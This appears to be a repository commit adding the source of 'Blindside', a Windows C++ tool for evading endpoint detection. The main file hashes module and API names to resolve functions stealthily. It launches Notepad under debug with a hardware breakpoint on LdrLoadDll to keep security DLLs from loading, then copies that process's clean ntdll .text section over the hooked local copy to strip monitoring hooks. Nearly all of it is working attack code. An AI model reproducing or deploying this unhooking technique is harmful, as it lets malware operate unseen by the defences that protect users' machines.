Projects STRLCPY Blindside Commits 12da9c55
🤬
  • ■ ■ ■ ■ ■ ■
    Blindside/Blindside.cpp
     1 +#include <Windows.h>
     2 +#include <iostream>
     3 +#include <sstream>
     4 +#include <unordered_map>
     5 +#include "Helpers.h"
     6 +#include "Stealth.h"
     7 +
     8 +using namespace std;
     9 +
     10 +
     11 +DWORD calcHash(char* data) {
     12 + DWORD hash = 0x99;
     13 + for (int i = 0; i < strlen(data); i++) {
     14 + hash += data[i] + (hash << 1);
     15 + }
     16 + return hash;
     17 +}
     18 +
     19 +static DWORD calcHashModule(LDR_MODULE* mdll) {
     20 + char name[64];
     21 + size_t i = 0;
     22 +
     23 + while (mdll->dllname.Buffer[i] && i < sizeof(name) - 1) {
     24 + name[i] = (char)mdll->dllname.Buffer[i];
     25 + i++;
     26 + }
     27 + name[i] = 0;
     28 + return calcHash((char*)CharLowerA(name));
     29 +}
     30 +
     31 +HMODULE GetModuleFromPEB(DWORD wModuleHash)
     32 +{
     33 +#if defined( _WIN64 )
     34 +#define PEBOffset 0x60
     35 +#define LdrOffset 0x18
     36 +#define ListOffset 0x10
     37 + unsigned long long pPeb = __readgsqword(PEBOffset); // read from the GS register
     38 +#elif defined( _WIN32 )
     39 +#define PEBOffset 0x30
     40 +#define LdrOffset 0x0C
     41 +#define ListOffset 0x0C
     42 + unsigned long pPeb = __readfsdword(PEBOffset);
     43 +#endif
     44 + pPeb = *reinterpret_cast<decltype(pPeb)*>(pPeb + LdrOffset);
     45 + PLDR_DATA_TABLE_ENTRY pModuleList = *reinterpret_cast<PLDR_DATA_TABLE_ENTRY*>(pPeb + ListOffset);
     46 + while (pModuleList->DllBase)
     47 + {
     48 +
     49 + char dll_name[MAX_PATH];
     50 + wcstombs(dll_name, pModuleList->BaseDllName.Buffer, MAX_PATH);
     51 +
     52 +
     53 + if (calcHash(CharLowerA(dll_name)) == wModuleHash) // Compare the dll name that we are looking for against the dll we are inspecting right now.
     54 + return (HMODULE)pModuleList->DllBase; // If found, return back the void* pointer
     55 + pModuleList = reinterpret_cast<PLDR_DATA_TABLE_ENTRY>(pModuleList->InLoadOrderLinks.Flink);
     56 + }
     57 + return nullptr;
     58 +}
     59 +
     60 +uintptr_t GetAPIFromPEBModule(void* hModule, DWORD ApiHash)
     61 +{
     62 +#if defined( _WIN32 )
     63 + unsigned char* lpBase = reinterpret_cast<unsigned char*>(hModule);
     64 + IMAGE_DOS_HEADER* idhDosHeader = reinterpret_cast<IMAGE_DOS_HEADER*>(lpBase);
     65 + if (idhDosHeader->e_magic == 0x5A4D)
     66 + {
     67 +#if defined( _M_IX86 )
     68 + IMAGE_NT_HEADERS32* inhNtHeader = reinterpret_cast<IMAGE_NT_HEADERS32*>(lpBase + idhDosHeader->e_lfanew);
     69 +#elif defined( _M_AMD64 )
     70 + IMAGE_NT_HEADERS64* inhNtHeader = reinterpret_cast<IMAGE_NT_HEADERS64*>(lpBase + idhDosHeader->e_lfanew);
     71 +#endif
     72 + if (inhNtHeader->Signature == 0x4550)
     73 + {
     74 + IMAGE_EXPORT_DIRECTORY* iedExportDirectory = reinterpret_cast<IMAGE_EXPORT_DIRECTORY*>(lpBase + inhNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
     75 + for (register unsigned int uiIter = 0; uiIter < iedExportDirectory->NumberOfNames; ++uiIter)
     76 + {
     77 + char* szNames = reinterpret_cast<char*>(lpBase + reinterpret_cast<unsigned long*>(lpBase + iedExportDirectory->AddressOfNames)[uiIter]);
     78 + if (calcHash(szNames) == ApiHash)
     79 + {
     80 + unsigned short usOrdinal = reinterpret_cast<unsigned short*>(lpBase + iedExportDirectory->AddressOfNameOrdinals)[uiIter];
     81 + return reinterpret_cast<uintptr_t>(lpBase + reinterpret_cast<unsigned long*>(lpBase + iedExportDirectory->AddressOfFunctions)[usOrdinal]);
     82 + }
     83 + }
     84 + }
     85 + }
     86 +#endif
     87 + return 0;
     88 +}
     89 +
     90 +PROCESS_INFORMATION createProcessInDebug(wchar_t* processName)
     91 +{
     92 + STARTUPINFO si;
     93 + PROCESS_INFORMATION pi;
     94 +
     95 + ZeroMemory(&si, sizeof(si));
     96 + si.cb = sizeof(si);
     97 + ZeroMemory(&pi, sizeof(pi));
     98 + HMODULE hKernel_32 = GetModuleFromPEB(109513359);
     99 + TypeCreateProcessW CreateProcessWCustom = (TypeCreateProcessW)GetAPIFromPEBModule(hKernel_32, 926060913);
     100 + BOOL hProcbool = CreateProcessWCustom(processName, processName, NULL, NULL, FALSE, DEBUG_PROCESS, NULL, NULL, &si, &pi);
     101 +
     102 + return pi;
     103 +}
     104 +
     105 +VOID SetHWBP(DWORD_PTR address, HANDLE hThread)
     106 +{
     107 + CONTEXT ctx = { 0 };
     108 + ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS | CONTEXT_INTEGER;
     109 + ctx.Dr0 = address;
     110 + ctx.Dr7 = 0x00000001;
     111 +
     112 +
     113 + SetThreadContext(hThread, &ctx);
     114 +
     115 + DEBUG_EVENT dbgEvent;
     116 + while (true)
     117 + {
     118 + if (WaitForDebugEvent(&dbgEvent, INFINITE) == 0)
     119 + break;
     120 +
     121 + if (dbgEvent.dwDebugEventCode == EXCEPTION_DEBUG_EVENT &&
     122 + dbgEvent.u.Exception.ExceptionRecord.ExceptionCode == EXCEPTION_SINGLE_STEP)
     123 + {
     124 +
     125 + CONTEXT newCtx = { 0 };
     126 + newCtx.ContextFlags = CONTEXT_ALL;
     127 + GetThreadContext(hThread, &newCtx);
     128 + if (dbgEvent.u.Exception.ExceptionRecord.ExceptionAddress == (LPVOID)address)
     129 + {
     130 + printf("[+] Breakpoint Hit!\n");
     131 + /*printf("[-] Exception (%#llx) ! Params:\n", dbgEvent.u.Exception.ExceptionRecord.ExceptionAddress);
     132 + printf("(1) Rcx: %#d | ", newCtx.Rcx);
     133 + printf("(2) Rdx: %#llx | ", newCtx.Rdx);
     134 + printf("(3) R8: %#llx | ", newCtx.R8);
     135 + printf("(4) R9: %#llx\n", newCtx.R9);
     136 + printf("RSP = %#llx\n", newCtx.Rsp);
     137 + printf("RAX = %#llx\n", newCtx.Rax);
     138 + printf("DR0 = %#llx\n", newCtx.Dr0);
     139 + printf("RIP = %#llx\n----------------------------------------\n", newCtx.Rip);*/
     140 +
     141 + newCtx.Dr0 = newCtx.Dr6 = newCtx.Dr7 = 0;
     142 + newCtx.EFlags |= (1 << 8);
     143 + return;
     144 + }
     145 + else {
     146 + newCtx.Dr0 = address;
     147 + newCtx.Dr7 = 0x00000001;
     148 + newCtx.EFlags &= ~(1 << 8);
     149 + }
     150 + SetThreadContext(hThread, &newCtx);
     151 + }
     152 + ContinueDebugEvent(dbgEvent.dwProcessId, dbgEvent.dwThreadId, DBG_CONTINUE);
     153 + }
     154 +}
     155 +
     156 +int CopyDLLFromDebugProcess(HANDLE hProc, size_t bAddress, BOOL stealth)
     157 +{
     158 +
     159 + HMODULE hKernel_32 = GetModuleFromPEB(109513359);
     160 + HMODULE hNtdll = GetModuleFromPEB(4097367);
     161 +
     162 + _NtReadVirtualMemory NtReadVirtualMemoryCustom = (_NtReadVirtualMemory)GetAPIFromPEBModule(hNtdll, 228701921503);
     163 + TypeVirtualProtect VirtualProtectCustom = (TypeVirtualProtect)GetAPIFromPEBModule(hKernel_32, 955026773);
     164 +
     165 + PIMAGE_DOS_HEADER ImgDosHeader = (PIMAGE_DOS_HEADER)bAddress;
     166 + PIMAGE_NT_HEADERS64 ntHeader = (PIMAGE_NT_HEADERS64)((DWORD_PTR)bAddress + ImgDosHeader->e_lfanew);
     167 + IMAGE_OPTIONAL_HEADER OptHeader = (IMAGE_OPTIONAL_HEADER)ntHeader->OptionalHeader;
     168 + PIMAGE_SECTION_HEADER textsection = IMAGE_FIRST_SECTION(ntHeader);
     169 +
     170 + DWORD DllSize = OptHeader.SizeOfImage;
     171 + PBYTE freshDll = new BYTE[DllSize];
     172 +
     173 + if (stealth)
     174 + {
     175 + LPVOID freshNtdll = VirtualAlloc(NULL, DllSize, MEM_COMMIT, PAGE_READWRITE);
     176 + NtReadVirtualMemoryCustom(hProc, (PVOID)bAddress, freshNtdll, DllSize, 0);
     177 + BOOL execute = Execute((PVOID)bAddress, freshNtdll, textsection);
     178 + if (execute)
     179 + {
     180 + return 0;
     181 + }
     182 + else {
     183 + return 1;
     184 + }
     185 + }
     186 + NTSTATUS status = (*NtReadVirtualMemoryCustom)(hProc, (PVOID)bAddress, freshDll, DllSize, 0);
     187 + if (status != 0)
     188 + {
     189 + printf("Error: NtReadVirtualMemoryCustom failed with error code %d\n", status);
     190 + delete[] freshDll;
     191 + return 1;
     192 + }
     193 +
     194 + for (WORD i = 0; i < ntHeader->FileHeader.NumberOfSections; i++)
     195 + {
     196 +
     197 +
     198 + PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((unsigned long long)IMAGE_FIRST_SECTION(ntHeader) + ((unsigned long long)IMAGE_SIZEOF_SECTION_HEADER * i));
     199 +
     200 + if (strcmp((char*)hookedSectionHeader->Name, (char*)".text") != 0)
     201 + continue;
     202 +
     203 + DWORD oldProtection = 0;
     204 + bool isProtected = VirtualProtectCustom((LPVOID)((DWORD_PTR)bAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
     205 +
     206 +
     207 +
     208 + DWORD textSectionSize = hookedSectionHeader->Misc.VirtualSize;
     209 +
     210 + // Get the source and destination addresses for the .text section
     211 + LPVOID srcAddr = (LPVOID)((DWORD_PTR)freshDll + (DWORD_PTR)hookedSectionHeader->VirtualAddress);
     212 + LPVOID destAddr = (LPVOID)((DWORD_PTR)bAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);
     213 +
     214 + // Calculate the number of chunks needed to copy the entire .text section
     215 + size_t chunkSize = 1024;
     216 + size_t numChunks = (textSectionSize + chunkSize - 1) / chunkSize;
     217 +
     218 + // Iterate over each chunk and copy it to the destination
     219 + for (size_t i = 0; i < numChunks; i++)
     220 + {
     221 + size_t chunkStart = i * chunkSize;
     222 + size_t chunkEnd = min(chunkStart + chunkSize, textSectionSize);
     223 + size_t chunkSize = chunkEnd - chunkStart;
     224 + memcpy((char*)destAddr + chunkStart, (char*)srcAddr + chunkStart, chunkSize);
     225 + }
     226 +
     227 + //memcpy((LPVOID)((DWORD_PTR)bAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)freshDll + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
     228 + isProtected = VirtualProtectCustom((LPVOID)((DWORD_PTR)bAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
     229 + if (isProtected == FALSE)
     230 + {
     231 + printf("[-] Failed to restore memory protection for DLL.\n");
     232 + return 1;
     233 + }
     234 +
     235 + delete[] freshDll;
     236 + return 0;
     237 +
     238 + }
     239 + printf("[-] Failed to find .text section of DLL.\n");
     240 + return 1;
     241 +}
     242 +
     243 +int main(int argc, char* argv[])
     244 +{
     245 + BOOL stealth = FALSE;
     246 + if (argc == 2)
     247 + {
     248 + if (strcmp(argv[1], "stealth") == 0) {
     249 + printf("[+] Stealth mode: Unhooking one function\n");
     250 + stealth = TRUE;
     251 + }
     252 +
     253 + }
     254 +
     255 + printf("[+] Creating new process in debug mode\n");
     256 + PROCESS_INFORMATION process = createProcessInDebug((wchar_t*)LR"(C:\Windows\Notepad.exe)");
     257 + HANDLE hThread = process.hThread;
     258 +
     259 + HMODULE hNtdll = GetModuleFromPEB(4097367);
     260 + HMODULE hKernel_32 = GetModuleFromPEB(109513359);
     261 + _LdrLoadDll LdrLoadDllCustom = (_LdrLoadDll)GetAPIFromPEBModule(hNtdll, 11529801);
     262 +
     263 + size_t LdrLoadDllAddress = reinterpret_cast<size_t>(LdrLoadDllCustom);
     264 + printf("[+] Found LdrLoadDllAddress address: 0x%p\n", LdrLoadDllAddress);
     265 +
     266 + printf("[+] Setting HWBP on remote process\n");
     267 +
     268 + SetHWBP((DWORD_PTR)LdrLoadDllAddress, hThread);
     269 + printf("[+] Copying clean ntdll from remote process\n");
     270 +
     271 +
     272 + size_t NtdllBAddress = reinterpret_cast<size_t>(hNtdll);
     273 + printf("[+] Found ntdll base address: 0x%p\n", NtdllBAddress);
     274 + int NtdllResult = CopyDLLFromDebugProcess(process.hProcess, NtdllBAddress, stealth);
     275 + if (NtdllResult == 0)
     276 + {
     277 + printf("[+] Unhooked\n");
     278 + }
     279 + else
     280 + {
     281 + printf("[-] Failed to unhook\n");
     282 + }
     283 +
     284 + CloseHandle(process.hProcess);
     285 + TerminateProcess(process.hProcess, 0);
     286 +
     287 + return 0;
     288 +}
     289 +
     290 + 
  • ■ ■ ■ ■ ■ ■
    Blindside/Blindside.vcxproj
     1 +<?xml version="1.0" encoding="utf-8"?>
     2 +<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
     3 + <ItemGroup Label="ProjectConfigurations">
     4 + <ProjectConfiguration Include="Debug|Win32">
     5 + <Configuration>Debug</Configuration>
     6 + <Platform>Win32</Platform>
     7 + </ProjectConfiguration>
     8 + <ProjectConfiguration Include="Release|Win32">
     9 + <Configuration>Release</Configuration>
     10 + <Platform>Win32</Platform>
     11 + </ProjectConfiguration>
     12 + <ProjectConfiguration Include="Debug|x64">
     13 + <Configuration>Debug</Configuration>
     14 + <Platform>x64</Platform>
     15 + </ProjectConfiguration>
     16 + <ProjectConfiguration Include="Release|x64">
     17 + <Configuration>Release</Configuration>
     18 + <Platform>x64</Platform>
     19 + </ProjectConfiguration>
     20 + </ItemGroup>
     21 + <PropertyGroup Label="Globals">
     22 + <VCProjectVersion>16.0</VCProjectVersion>
     23 + <Keyword>Win32Proj</Keyword>
     24 + <ProjectGuid>{a1e8acba-a0b7-47db-a3db-4bc45348c1a3}</ProjectGuid>
     25 + <RootNamespace>Blindside</RootNamespace>
     26 + <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
     27 + </PropertyGroup>
     28 + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
     29 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
     30 + <ConfigurationType>Application</ConfigurationType>
     31 + <UseDebugLibraries>true</UseDebugLibraries>
     32 + <PlatformToolset>v143</PlatformToolset>
     33 + <CharacterSet>Unicode</CharacterSet>
     34 + </PropertyGroup>
     35 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
     36 + <ConfigurationType>Application</ConfigurationType>
     37 + <UseDebugLibraries>false</UseDebugLibraries>
     38 + <PlatformToolset>v143</PlatformToolset>
     39 + <WholeProgramOptimization>true</WholeProgramOptimization>
     40 + <CharacterSet>Unicode</CharacterSet>
     41 + </PropertyGroup>
     42 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
     43 + <ConfigurationType>Application</ConfigurationType>
     44 + <UseDebugLibraries>true</UseDebugLibraries>
     45 + <PlatformToolset>v143</PlatformToolset>
     46 + <CharacterSet>Unicode</CharacterSet>
     47 + </PropertyGroup>
     48 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
     49 + <ConfigurationType>Application</ConfigurationType>
     50 + <UseDebugLibraries>false</UseDebugLibraries>
     51 + <PlatformToolset>v143</PlatformToolset>
     52 + <WholeProgramOptimization>true</WholeProgramOptimization>
     53 + <CharacterSet>Unicode</CharacterSet>
     54 + </PropertyGroup>
     55 + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
     56 + <ImportGroup Label="ExtensionSettings">
     57 + </ImportGroup>
     58 + <ImportGroup Label="Shared">
     59 + </ImportGroup>
     60 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     61 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     62 + </ImportGroup>
     63 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     64 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     65 + </ImportGroup>
     66 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     67 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     68 + </ImportGroup>
     69 + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     70 + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
     71 + </ImportGroup>
     72 + <PropertyGroup Label="UserMacros" />
     73 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     74 + <ClCompile>
     75 + <WarningLevel>Level3</WarningLevel>
     76 + <SDLCheck>true</SDLCheck>
     77 + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     78 + <ConformanceMode>true</ConformanceMode>
     79 + </ClCompile>
     80 + <Link>
     81 + <SubSystem>Console</SubSystem>
     82 + <GenerateDebugInformation>true</GenerateDebugInformation>
     83 + </Link>
     84 + </ItemDefinitionGroup>
     85 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     86 + <ClCompile>
     87 + <WarningLevel>Level3</WarningLevel>
     88 + <FunctionLevelLinking>true</FunctionLevelLinking>
     89 + <IntrinsicFunctions>true</IntrinsicFunctions>
     90 + <SDLCheck>true</SDLCheck>
     91 + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     92 + <ConformanceMode>true</ConformanceMode>
     93 + </ClCompile>
     94 + <Link>
     95 + <SubSystem>Console</SubSystem>
     96 + <EnableCOMDATFolding>true</EnableCOMDATFolding>
     97 + <OptimizeReferences>true</OptimizeReferences>
     98 + <GenerateDebugInformation>true</GenerateDebugInformation>
     99 + </Link>
     100 + </ItemDefinitionGroup>
     101 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     102 + <ClCompile>
     103 + <WarningLevel>Level3</WarningLevel>
     104 + <SDLCheck>true</SDLCheck>
     105 + <PreprocessorDefinitions>_DEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     106 + <ConformanceMode>true</ConformanceMode>
     107 + </ClCompile>
     108 + <Link>
     109 + <SubSystem>Console</SubSystem>
     110 + <GenerateDebugInformation>true</GenerateDebugInformation>
     111 + </Link>
     112 + </ItemDefinitionGroup>
     113 + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     114 + <ClCompile>
     115 + <WarningLevel>Level3</WarningLevel>
     116 + <FunctionLevelLinking>true</FunctionLevelLinking>
     117 + <IntrinsicFunctions>true</IntrinsicFunctions>
     118 + <SDLCheck>true</SDLCheck>
     119 + <PreprocessorDefinitions>NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
     120 + <ConformanceMode>true</ConformanceMode>
     121 + <LanguageStandard>stdcpplatest</LanguageStandard>
     122 + </ClCompile>
     123 + <Link>
     124 + <SubSystem>Console</SubSystem>
     125 + <EnableCOMDATFolding>true</EnableCOMDATFolding>
     126 + <OptimizeReferences>true</OptimizeReferences>
     127 + <GenerateDebugInformation>true</GenerateDebugInformation>
     128 + </Link>
     129 + </ItemDefinitionGroup>
     130 + <ItemGroup>
     131 + <ClCompile Include="Blindside.cpp" />
     132 + </ItemGroup>
     133 + <ItemGroup>
     134 + <ClInclude Include="Helpers.h" />
     135 + <ClInclude Include="Stealth.h" />
     136 + </ItemGroup>
     137 + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
     138 + <ImportGroup Label="ExtensionTargets">
     139 + </ImportGroup>
     140 +</Project>
  • ■ ■ ■ ■ ■ ■
    Blindside/Blindside.vcxproj.filters
     1 +<?xml version="1.0" encoding="utf-8"?>
     2 +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
     3 + <ItemGroup>
     4 + <Filter Include="Source Files">
     5 + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
     6 + <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
     7 + </Filter>
     8 + <Filter Include="Header Files">
     9 + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
     10 + <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
     11 + </Filter>
     12 + <Filter Include="Resource Files">
     13 + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
     14 + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
     15 + </Filter>
     16 + </ItemGroup>
     17 + <ItemGroup>
     18 + <ClCompile Include="Blindside.cpp">
     19 + <Filter>Source Files</Filter>
     20 + </ClCompile>
     21 + </ItemGroup>
     22 + <ItemGroup>
     23 + <ClInclude Include="Helpers.h">
     24 + <Filter>Header Files</Filter>
     25 + </ClInclude>
     26 + <ClInclude Include="Stealth.h">
     27 + <Filter>Header Files</Filter>
     28 + </ClInclude>
     29 + </ItemGroup>
     30 +</Project>
  • ■ ■ ■ ■ ■ ■
    Blindside/Blindside.vcxproj.user
     1 +<?xml version="1.0" encoding="utf-8"?>
     2 +<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
     3 + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
     4 + <LocalDebuggerCommandArguments>
     5 + </LocalDebuggerCommandArguments>
     6 + <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
     7 + </PropertyGroup>
     8 +</Project>
  • ■ ■ ■ ■ ■ ■
    Blindside/Helpers.h
     1 +#pragma once
     2 +#include <Windows.h>
     3 +#include <functional>
     4 +
     5 +
     6 +#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
     7 +#define STK_ARGS 8
     8 +using EXCEPTION_FUNC = std::function <void(PEXCEPTION_POINTERS)>;
     9 +
     10 +
     11 +
     12 +typedef struct _UNICODE_STRING
     13 +{
     14 + union {
     15 + USHORT Length;
     16 + USHORT LengthInBytes;
     17 + };
     18 + union {
     19 + USHORT MaximumLength;
     20 + USHORT MaximumLengthInBytes;
     21 + };
     22 + PWSTR Buffer;
     23 +} UNICODE_STRING, * PUNICODE_STRING;
     24 +
     25 +
     26 +struct LDR_MODULE {
     27 + LIST_ENTRY e[3];
     28 + HMODULE base;
     29 + void* entry;
     30 + UINT size;
     31 + UNICODE_STRING dllPath;
     32 + UNICODE_STRING dllname;
     33 +};
     34 +
     35 +typedef struct _LDR_DATA_TABLE_ENTRY
     36 +{
     37 + LIST_ENTRY InLoadOrderLinks;
     38 + LIST_ENTRY InMemoryOrderLinks;
     39 + LIST_ENTRY InInitializationOrderLinks;
     40 + PVOID DllBase;
     41 + PVOID EntryPoint;
     42 + DWORD SizeOfImage;
     43 + UNICODE_STRING FullDllName;
     44 + UNICODE_STRING BaseDllName;
     45 + DWORD Flags;
     46 + WORD LoadCount;
     47 + WORD TlsIndex;
     48 + LIST_ENTRY HashLinks;
     49 + PVOID SectionPointer;
     50 + DWORD CheckSum;
     51 + DWORD TimeDateStamp;
     52 + PVOID LoadedImports;
     53 + PVOID EntryPointActivationContext;
     54 + PVOID PatchInformation;
     55 +}LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
     56 +
     57 +typedef struct _OBJECT_ATTRIBUTES {
     58 + ULONG Length;
     59 + HANDLE RootDirectory;
     60 + PUNICODE_STRING ObjectName;
     61 + ULONG Attributes;
     62 + PVOID SecurityDescriptor;
     63 + PVOID SecurityQualityOfService;
     64 +} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
     65 +
     66 +typedef struct _PEB_LDR_DATA
     67 +{
     68 + DWORD dwLength;
     69 + DWORD dwInitialized;
     70 + LPVOID lpSsHandle;
     71 + LIST_ENTRY InLoadOrderModuleList;
     72 + LIST_ENTRY InMemoryOrderModuleList;
     73 + LIST_ENTRY InInitializationOrderModuleList;
     74 + LPVOID lpEntryInProgress;
     75 +} PEB_LDR_DATA, * PPEB_LDR_DATA;
     76 +
     77 +typedef struct {
     78 + uintptr_t function_addr; // +0x0
     79 + uintptr_t syscall_addr; // +0x12
     80 + UINT pos;
     81 +} ADDRESS_INFORMATION;
     82 +
     83 +typedef struct _PEB_FREE_BLOCK
     84 +{
     85 + struct _PEB_FREE_BLOCK* pNext;
     86 + DWORD dwSize;
     87 +} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
     88 +
     89 +//redefine PEB struct
     90 +typedef struct __PEB
     91 +{
     92 + BYTE bInheritedAddressSpace;
     93 + BYTE bReadImageFileExecOptions;
     94 + BYTE bBeingDebugged;
     95 + BYTE bSpareBool;
     96 + LPVOID lpMutant;
     97 + LPVOID lpImageBaseAddress;
     98 + PPEB_LDR_DATA pLdr;
     99 + LPVOID lpProcessParameters;
     100 + LPVOID lpSubSystemData;
     101 + LPVOID lpProcessHeap;
     102 + PRTL_CRITICAL_SECTION pFastPebLock;
     103 + LPVOID lpFastPebLockRoutine;
     104 + LPVOID lpFastPebUnlockRoutine;
     105 + DWORD dwEnvironmentUpdateCount;
     106 + LPVOID lpKernelCallbackTable;
     107 + DWORD dwSystemReserved;
     108 + DWORD dwAtlThunkSListPtr32;
     109 + PPEB_FREE_BLOCK pFreeList;
     110 + DWORD dwTlsExpansionCounter;
     111 + LPVOID lpTlsBitmap;
     112 + DWORD dwTlsBitmapBits[2];
     113 + LPVOID lpReadOnlySharedMemoryBase;
     114 + LPVOID lpReadOnlySharedMemoryHeap;
     115 + LPVOID lpReadOnlyStaticServerData;
     116 + LPVOID lpAnsiCodePageData;
     117 + LPVOID lpOemCodePageData;
     118 + LPVOID lpUnicodeCaseTableData;
     119 + DWORD dwNumberOfProcessors;
     120 + DWORD dwNtGlobalFlag;
     121 + LARGE_INTEGER liCriticalSectionTimeout;
     122 + DWORD dwHeapSegmentReserve;
     123 + DWORD dwHeapSegmentCommit;
     124 + DWORD dwHeapDeCommitTotalFreeThreshold;
     125 + DWORD dwHeapDeCommitFreeBlockThreshold;
     126 + DWORD dwNumberOfHeaps;
     127 + DWORD dwMaximumNumberOfHeaps;
     128 + LPVOID lpProcessHeaps;
     129 + LPVOID lpGdiSharedHandleTable;
     130 + LPVOID lpProcessStarterHelper;
     131 + DWORD dwGdiDCAttributeList;
     132 + LPVOID lpLoaderLock;
     133 + DWORD dwOSMajorVersion;
     134 + DWORD dwOSMinorVersion;
     135 + WORD wOSBuildNumber;
     136 + WORD wOSCSDVersion;
     137 + DWORD dwOSPlatformId;
     138 + DWORD dwImageSubsystem;
     139 + DWORD dwImageSubsystemMajorVersion;
     140 + DWORD dwImageSubsystemMinorVersion;
     141 + DWORD dwImageProcessAffinityMask;
     142 + DWORD dwGdiHandleBuffer[34];
     143 + LPVOID lpPostProcessInitRoutine;
     144 + LPVOID lpTlsExpansionBitmap;
     145 + DWORD dwTlsExpansionBitmapBits[32];
     146 + DWORD dwSessionId;
     147 + ULARGE_INTEGER liAppCompatFlags;
     148 + ULARGE_INTEGER liAppCompatFlagsUser;
     149 + LPVOID lppShimData;
     150 + LPVOID lpAppCompatInfo;
     151 + UNICODE_STRING usCSDVersion;
     152 + LPVOID lpActivationContextData;
     153 + LPVOID lpProcessAssemblyStorageMap;
     154 + LPVOID lpSystemDefaultActivationContextData;
     155 + LPVOID lpSystemAssemblyStorageMap;
     156 + DWORD dwMinimumStackCommit;
     157 +} _PEB, * _PPEB;
     158 +
     159 +
     160 +typedef NTSTATUS(WINAPI* _NtReadVirtualMemory)(
     161 + HANDLE ProcessHandle,
     162 + PVOID BaseAddress,
     163 + PVOID Buffer,
     164 + SIZE_T BufferSize,
     165 + DWORD* NumberOfBytesRead
     166 + );
     167 +
     168 +typedef NTSTATUS(WINAPI* _LdrLoadDll)(
     169 + PWCHAR PathToFile OPTIONAL,
     170 + ULONG Flags OPTIONAL,
     171 + PUNICODE_STRING ModuleFileName,
     172 + PHANDLE ModuleHandle
     173 + );
     174 +
     175 +
     176 +typedef BOOL(WINAPI* TypeVirtualProtect)(
     177 + LPVOID lpAddress,
     178 + SIZE_T dwSize,
     179 + DWORD flNewProtect,
     180 + PDWORD lpflOldProtect
     181 + );
     182 +
     183 +typedef BOOL(WINAPI* TypeNtAllocateVirtualMemory)(
     184 + HANDLE ProcessHandle,
     185 + PVOID* BaseAddress,
     186 + ULONG ZeroBits,
     187 + PSIZE_T RegionSize,
     188 + ULONG AllocationType,
     189 + ULONG Protect
     190 + );
     191 +
     192 +
